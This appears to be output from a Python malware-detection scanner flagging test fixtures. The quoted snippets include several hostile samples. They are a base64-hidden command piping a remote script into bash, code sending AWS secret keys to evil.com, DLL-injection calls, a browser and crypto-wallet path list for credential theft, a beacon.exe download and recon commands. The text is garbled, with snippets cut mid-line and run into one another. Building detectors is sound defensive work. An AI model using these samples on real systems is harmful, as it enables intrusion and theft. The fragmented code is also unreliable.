Code eval using variable reassignment warning[HX3000]: Possible execution of unwanted code
┌─ resources/test/test.py:2:1
│
1 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
2 │ _ceil(" pass" Shell execution using base64 warning[HX4020]: Execution of an obfuscated shell command via __import__.
┌─ resources/test/test.py:3:1
│
1 │ import base64
2 │
3 │ ╭ __import__(" subprocess" " Y3VybCAtZnNTTCBodHRwczovL2dpdGh1Yi0tdGVjaC1zdXBwb3J0LmNvbS9zdXBwb3J0LnNoIHwgYmFzaA==" command via ` __import__` warning[HX3000]: Possible execution of unwanted code (eval)
┌─ resources/test/test.py:3:1
│
1 │ import sys
2 │
3 │ getattr(sys.modules[" built" " ins" " " " al" " ev" " 1+1" warning[HX3040]: Possible DLL injection. Process manipulation using ` OpenProcess` " C:\\ Windows\\ System32\\ user32.dll" if not process_handle:
16 │ sys.exit(f" Failed to open process {pid}" warning[HX3040]: Possible DLL injection. Process manipulation using ` WriteProcessMemory` ' ascii' if not kernel32.CreateRemoteThread(process_handle, None, 0,
│
= Confidence: High warning[HX3040]: Possible DLL injection. CDLL is used to load a DLL.
┌─ resources/test/dll_injection_01.py:35:1
│
32 │ print(f" [*] DLL injected, thread ID: {thread_id.value}" " libc.so.6" Access to sensitive secrets warning[HX2010]: Access to sensitive environment variable
┌─ resources/test/env_01.py:6:23
│
3 │ def send_secrets ():
4 │ secrets = {
5 │ " key_id" " AWS_ACCESS_KEY_ID" " secret_key" " AWS_SECRET_ACCESS_KEY" " https://evil.com/exfil" warning[HX1010]: Potential enumeration of Opera Software browser path.
┌─ resources/test/test.py:4:6
│
1 │ browserPaths=[
2 │ [f" {roaming}/Opera Software/Opera GX Stable" ' opera.exe' ' /Local Storage/leveldb' ' /' ' /Network' ' /Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' " {roaming}/Opera Software/Opera Stable" ' opera.exe' ' /Local Storage/leveldb' ' /' ' /Network' ' /Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' " {roaming}/Opera Software/Opera Neon/User Data/Default" ' opera.exe' ' /Local Storage/leveldb' ' /' ' /Network' ' /Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' " {local}/Google/Chrome/User Data" ' chrome.exe' ' /Default/Local Storage/leveldb' ' /Default' ' /Default/Network' ' /Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' " {local}/Google/Chrome SxS/User Data" ' chrome.exe' ' /Default/Local Storage/leveldb' ' /Default' ' /Default/Network' ' /Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' " {local}/BraveSoftware/Brave-Browser/User Data" ' brave.exe' ' /Default/Local Storage/leveldb' ' /Default' ' /Default/Network' ' /Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' = Confidence: High warning[HX6010]: Sequence hex literals found, potentially dangerous payload/shellcode.
┌─ resources/test/test.py:1:13
│
1 │ shellcode = [
│ ╭─────────────^
2 │ │ 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
3 │ │ 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
4 │ │ 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
· │
30 │ │ 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65
31 │ │ ]
│ ╰─^ HX6010
│
= Confidence: Medium
Help: Hex-encoded literals can be used to craft malicious payloads or shellcode.
warning[HX6050]: Suspicious command. Reconnaissance checks.
┌─ resources/test/test.py:1:15
│
1 │ recon_cmds = [' uname -a' ' /etc/passwd' ' uname -a' ' /etc/passwd' warning[HX8000]: Suspicious binary download.
┌─ resources/test/test.py:4:5
│
1 │ import requests
2 │
3 │
4 │ r = requests.get(" https://www.example.com/beacon.exe" " beacon.exe" " wb" warning[HX6000]: Base64 encoded string found, potentially obfuscated code.
┌─ resources/test/literal_02.py:3:25
│
1 │ import base64
2 │
3 │ data = base64.b64decode(" dHJ5OgogICAgX19QWU9fXzAyNTQgPSBsYW1iZGEgeDp4LnJlcGxhY2UoIl9fUFlPX18zOTYzIiwibSIpLnJlcGxhY2UoIl9fUFlPX185NjUxIiwgInAiKS5yZXBsYWNlKCJfX1BZT19fMDc1NCIsICJhIikucmVwbGFjZSgiX19QWU9fXzkzNjQiLCAicyIpLnJlcGxhY2UoIl9fUFlPX184NTQxIiwiZSIpLnJlcGxhY2UoIl9fUFlPX18xMzQ3IiwgInIiKS5yZXBsYWNlKCJfX1BZT19fODY1MyIsImIiKS5yZXBsYWNlKCJfX1BZT19fMjUxNCIsICJvIikucmVwbGFjZSgiX19QWU9fXzI3NTQiLCAidCIpLnJlcGxhY2UoIl9fUFlPX184NDEzIiwiaSIpLnJlcGxhY2UoIl9fUFlPX18wOTg1IiwgImMiKS5yZXBsYWNlKCJfX1BZT19fNDcwMSIsICIuIikucmVwbGFjZSgiX19QWU9fXzgwNTEiLCAibCIpLnJlcGxhY2UoIl9fUFlPX18zODYiLCAiKCIpLnJlcGxhY2UoIl9fUFlPX18zMzUiLCAiKSIpCiAgICBleGVjKF9fUFlPX18wMjU0KCJfX1BZT19fODQxM19fUFlPX18zOTYzX19QWU9fXzk2NTFfX1BZT19fMjUxNF9fUFlPX18xMzQ3X19QWU9fXzI3NTQgX19QWU9fXzM5NjNfX1BZT19fMDc1NF9fUFlPX18xMzQ3X19QWU9fXzkzNjRoX19QWU9fXzA3NTRfX1BZT19fODA1MSBfX1BZT19fMDc1NF9fUFlPX185MzY0IF9fUFlPX18zOTYzLCBfX1BZT19fODY1M19fUFlPX18wNzU0X19QWU9fXzkzNjRfX1BZT19fODU0MTY0IF9fUFlPX18wNzU0X19QWU9fXzkzNjQgX19QWU9fXzg2NTMiKSk=" SSH private key enumeration ┌─ resources/test/literal_05.py:4:30
│
1 │ import os
2 │
3 │ key_name = " id_rsa" " ~/.ssh"
Suspicious comments
warning[HX8020]: Pyarmor is a code obfuscation tool that can be used to hide malicious code.
┌─ resources/test/comments_01.py:7:1
│
4 │
5 │
6 │ # Pyarmor 8.2.9 (trial), 000000, 2024-04-30T14:19:52.674801